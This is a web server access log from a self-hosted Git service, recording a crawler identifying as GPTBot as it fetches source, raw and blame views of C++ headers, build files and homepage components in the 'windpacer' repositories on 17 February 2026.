"/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10820] [Gzip 3.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9991] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:15:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12704] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11318] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13576] [Gzip 7.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:15:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 9933] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:15:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 11900] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12943] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12360] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13131] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12756] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:15:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12706] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:36 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" +[17/Feb/2026:15:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fobj%2fDebug" [Client 74.7.227.38] [Length 25637] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" +[17/Feb/2026:15:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" +[17/Feb/2026:15:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 12634] [Gzip 6.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 666] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10435] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:15:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:15:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" [Client 74.7.227.38] [Length 2115] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/rules.ninja" +[17/Feb/2026:15:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10993] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:15:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:15:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/README.md" [Client 74.7.227.38] [Length 9764] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:15:35:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" +[17/Feb/2026:15:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14834] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" +[17/Feb/2026:15:35:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" +[17/Feb/2026:15:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14218] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx" +[17/Feb/2026:15:35:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16491] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Contact.tsx" +[17/Feb/2026:15:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" +[17/Feb/2026:15:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15566] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" +[17/Feb/2026:15:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13949] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/About.tsx" +[17/Feb/2026:15:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Hero.tsx" +[17/Feb/2026:15:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx" +[17/Feb/2026:15:35:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14677] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx" +[17/Feb/2026:15:35:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 